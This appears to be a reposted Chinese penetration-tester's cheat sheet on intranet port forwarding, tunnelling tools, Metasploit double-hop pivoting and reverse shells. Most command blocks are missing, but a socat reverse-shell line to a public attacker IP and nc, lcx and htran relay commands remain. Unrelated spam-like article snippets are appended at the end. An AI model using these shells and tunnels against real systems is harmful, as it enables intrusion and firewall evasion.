内网小组 | 端口转发 全剧终

访客4年前黑客工具989

本文作者: 掉到鱼缸里的猫(Ms08067内网安全小组成员)

文章来源|MS08067 内网安全知识星球

内网纵横四海 认准Ms08067


NetCat

*** 一:

靶机:

攻击机:nc -nv 靶机IP 靶机监听端口

反向Shell:

靶机:

不能转发3389

正向shell

靶机:

攻击机:nc 目标IP 端口

lcx


服务端:lcx -slave 公网IP 公网端口 本地IP 本地端口

公网客户端:lcx -listen 远程端口 本地端口

客户端连接本地端口,对应于连接远程端口

先启动listen,再启动slave

reGeorg

服务端:上传脚本到Web目录,服务器要求打开 enable_dl 功能

同时安装 php_sockets扩展客户端:

使用Proxifier将需要的流量引入本地端口sock5模式

有脚本可以指定不使用sock5协议

Tunna

使用Proxifier将需要的流量引入本地端口sock5模式

使用 -n 参数关闭sock协议
image.png

这个False问题不大

不能用linux的rdesktop连接,要用Windows的远程桌面连接

image.png

这种情况问题也不大

点击是之前再运行一次脚本就行

reDuh

服务端:上传脚本到Web目录

客户端:java -jar reDuhClient.jar http://脚本位置 进行连接

本地连接java返回的本地端口 nc -vv localhost 本地端口

在命令提示符中输入 [createTunnel]本地空闲端口:目标地址(想要访问的目标内网地址):目 标端口

htran

服务器(目标主机):htran -slave 跳板IP 跳板port 本地ip 本地端口

跳板机:htran -tran 跳板port 公网IP 公网端口

客户端(公网主机):htran -listen 公网监听端口 流量接收端口

socat

靶机:socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:公网IP:公网端口

攻击机:socat TCP-LISTEN:端口 - ,nc监听也行

SSH

穿透两个 ***

公网跳板A:跳板A在B和C的两个内网中间

本地流量转发

image.png

为什么说是“本地”(单纯的-L选项):

本地端口转发绑定的是 lookback 接口,这意味着只有localhost 或者 127.0.0.1 才能使用本机的端口转发 ,
其他机器发起的连接只会得到“ connection refused. ”

但是可以利用GatewayPorts(-g)关键字来与其他机器共享这个本地转发端口。

远程转发

image.png

动态转发

image.png

两层ssh

image.png

NPS

Earthworm(EW)

EW 是一套便携式的 *** 穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂 *** 环境下完成 *** 穿透。

iox

  • 具有流量加密
  • 友好的命令行参数
  • 逻辑优化
  • UDP流量转发
  • https://github.com/EddieIvan01/iox

ngrok

各种系统都支持,支持内网穿透

利用IIS端口共享功能

……说实话,没来得及尝试,单看文档没看懂

利用IIS的端口共享功能绕过防火墙

反弹shell

NC/Telent

telnet 可以换成 nc

*** 一:

成功后没有提示,尝试命令即可

*** 二:

*** 三:

*** 四:

*** 五:

并不是所有的NC都有-e选项……有些设备可能/bin下面没有nc,但是busybox可以啊

bash 反弹shell

加密流量参看权限维持笔记

利用awk、gawk

1. 攻击机执行监听

2. 靶机执行

Python 反弹shell

命令行直接执行 python -c '代码'

php反弹shell

命令行执行 php -r '代码'

java反弹shell

Perl反弹Shell

命令行执行 perl -e ‘代码’

Lua

Ruby

Node.js

利用sshd反弹shell


*** 一:

*** 二:

1. 靶机执行:


2. 攻击机执行:

MSF 反弹shell 一句话


msfvenom -l payloads | grep "cmd/unix"|awk '{print $1}'
image.png

xterm下反弹


  • 靶机运行 xterm -display 目标地址:1
  • 接收方运行 xnest :1

image.png

Metasploit穿透双层 ***


image.png

攻击机通过两层跳板,对192.168.12.0/24 *** 进行扫描

1. 攻击机获得双网卡主机A的meterpreter会话

2. 执行命令,创建路由规则,只要会话不断开Metasploit框架就可以访问192.168.11.0/24网段

3. 配置流量转发 ***

4. 在proxychains配置文件中添加sock4 *** 规则,即可通过proxychains实现流量转发

5. 实现端口转发

6.获取双网卡主机B的控制权(使用bindTCP的payload,因为反向shell无法路由到攻击机),获取到meterpreter会话之后添加路由规则

7. 再次配置流量转发 *** (再开个新端口)

8. 修改proxychains配置文件,取消下文的注释,添加新的socks4 ***


利用系统自带功能

Windows 双网卡路由


双网卡Windows主机作为路由:

1.通过注册表允许网卡进行流量转发: 修改注册表

2. 开启 Routing and Remote Access 服务

3. 两侧主机添加静态路由规则,路由指向双网卡主机

Windows netsh命令端口转发


管理员权限cmd执行

不成功的话,先关闭防火墙

查看端口映射配置:

netsh interface portproxy show all

1.为e:\f.exe 添加防火墙规则,需要管理员权限。

删除

2、添加端口

删除

iptables:

image.png

  • PREROUTING:在进行路由判断之前所要进行的规则(DNAT/REDIRECT)(数据包进入主机后之一步),决定目标地址的改变与否 + 上下路的判定(是过滤型防火墙还是NAT防火墙)。
  • INPUT:处理入站的数据包
  • OUTPUT:处理出站的数据包
  • FORWARD:是否允许被防火墙继续转发 + 是否允许使用Linux的路由/转发功能。
  • POSTROUTING:对数据包在经过路由表之后,最后一个处理步骤(数据包流出主机前最后的步骤),决定数据包是否需要改变 源地址。

两条链重要功能在于修改IP,而这两条链修改的IP又是不一样的,POSTROUTING在修改来源IP,PREROUTING则在修改目标IP 。

由于修改的 IP 不一样,所以就称为来源NAT (Source NAT, SNAT) 及目标 NAT (Destination NAT, DNAT)。

只用POSTROUTING:从请求侧来看的话,只修改源IP

image.png

两个结合起来就可以当做端口转发了:

参考
常见端口转发工具的使用方式

浅谈内网端口转发

Linux iptables用法与NAT

相关文章

我国正式启动6G技术研发工作怎么回事?启动6G技术研发工作有何意义

据科技部官网,为促进我国移动通信产业发展和科技创新,推动第六代移动通信(6G)技术研发工作,2019年11月3日,科技部会同发展改革委、教育部、工业和信息化部、中科院、自然科学基金委在北京组织召开6G...

泰语我爱你怎么说语音(100种语言我爱你)

英 语:i love you 法 语:je t’aime,je t’adore 德 语:ich liebe dich 希 腊语:s’agapo 犹 太语:ani ohev otach(male o...

微元素:新用户靠脸免费赚32元以上!

以前我们都把靠脸用饭看成一句笑谈,除非你真是人中龙凤,貌美如花,直到刷脸认证泛起后,许多平台都用上了,普通人也可以靠脸免费赚钱。好比这个“微米素”,实名认证刷脸,免费赠予“实名米素包”,天天看10个广...

黑客类书籍,黑客可以破解微信语音吗,黑客解锁电脑密码教程视频

文件办理 185.222.202[.]79:443XSS 主动点按钮有什么损害?cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 ef...

谷歌黑客找sql注入点-黑客专属应用(黑客专属图片)

谷歌黑客找sql注入点-黑客专属应用(黑客专属图片)

谷歌黑客找sql注入点相关问题 黑客专属名字相关问题 白客怎么对付黑客 geeker黑客模拟软件(黑客模拟软件下载)...

导游词欢迎词(导游词欢迎词范文)

导游自我介绍欢迎词和导游词都是有一个固定的模式,根据你所面对的旅游团队不同,可以有重点的侧重介绍你自己和致欢迎。 欢迎词也是属于导游词的一种,主要是介绍自己、公司、及司机,还需要简单介绍行程。 1、各...